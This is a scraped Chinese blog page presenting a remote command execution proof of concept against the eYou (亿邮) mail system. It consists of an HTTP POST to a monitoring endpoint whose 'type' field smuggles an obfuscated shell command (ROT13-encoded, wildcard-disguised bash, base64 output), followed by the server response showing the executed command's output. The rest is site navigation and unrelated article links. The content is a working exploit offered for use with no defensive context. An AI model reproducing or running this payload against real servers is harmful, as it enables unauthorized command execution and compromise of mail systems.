zoukankan      html  css  js  c++  java
  • 亿邮RCE

    REQUEST:
    POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.0
    Host: 
    Connection: close
    Content-Length: 85
    Cache-Control: max-age=0
    Sec-Ch-Ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
    Sec-Ch-Ua-Mobile: ?0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
    Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Content-Type: application/x-www-form-urlencoded
    
    
    type='|echo "png /cebp/irefvba" |tr 'N-ZA-Mn-za-m' 'A-Za-z' | /bin/ba?h | base64||'
    

      

    RESPONSE:
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Thu, 08 Apr 2021 15:25:37 GMT
    Content-Type: image/gif
    Connection: close
    P3P: CP=CAO PSA OUR
    Set-Cookie: EMPHPSID=0hb64kr702b1khlgh94tv4ah77; path=/; HttpOnly
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Thu, 08 Apr 2021 15:25:37 GMT
    Cache-Control: no-cache, must-revalidate
    Pragma: no-cache
    
    
    <html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
    !--
    var _location = window.location;
    var _pathname = _location.pathname;
    var _qs = _location.search;
    
    if (-1 === _pathname.indexOf("plugin")) { / system
    var qs = _location.search.substr(1).replace(/furl=[0-9a-zA-Z]*/g, "");
    var url = "?q=logout.do&furl=" encodeURIComponent(qs);
    alert("您没有登录,或者登录已经过期,请重新登录。Code: 01");
    top.location = url;
    } else { / plugin
    alert("您没有登录,或者登录已经过期,请重新登录。Code: 02");
    var url = "?q=logout.do&furl=" encodeURIComponent(_pathname _qs);
    top.location = _location.protocol "/" _location.host "/webadm/" url;
    }
    /--!
    </script></head><body></body></html>TGludXggdmVyc2lvbiAzLjEwLjAtOTU3LjEyLjIuYXhzNy54ODZfNjQgKHJvb3RAaG9zdDU0KSAo
    Z2NjIHZlcnNpb24gNC44LjUgMjAxNTA2MjMgKFJlZCBIYXQgNC44LjUtMzYpIChHQ0MpICkgIzEg
    U01QIE1vbiBKdW4gMyAwOTozMzozMCBDU1QgMjAxOQo=
    

      

  • 相关阅读:
    欧拉计划之题目2:在斐波那契数列中,找出4百万以下的项中值为偶数的项之和。
    MFC非模态对话框的销毁
    MFC:只允许产生一个应用程序实例的具体实现
    从_tiddata看CRT的线程不安全函数
    关于消息循环的深入分析
    MFC:关于MFC窗口对象(CWnd对象)与Window对象(HWND所指对象)的销毁问题
    使用FindFirstFile和FindNextFile对给定目录下所有文件进行广度优先遍历
    工作线程的消息循环与通信
    MFC和设计模式
    _endthreadex与CloseHandle
  • 原文地址:https://www.cnblogs.com/0day-li/p/14637579.html
Copyright © 2011-2022 走看看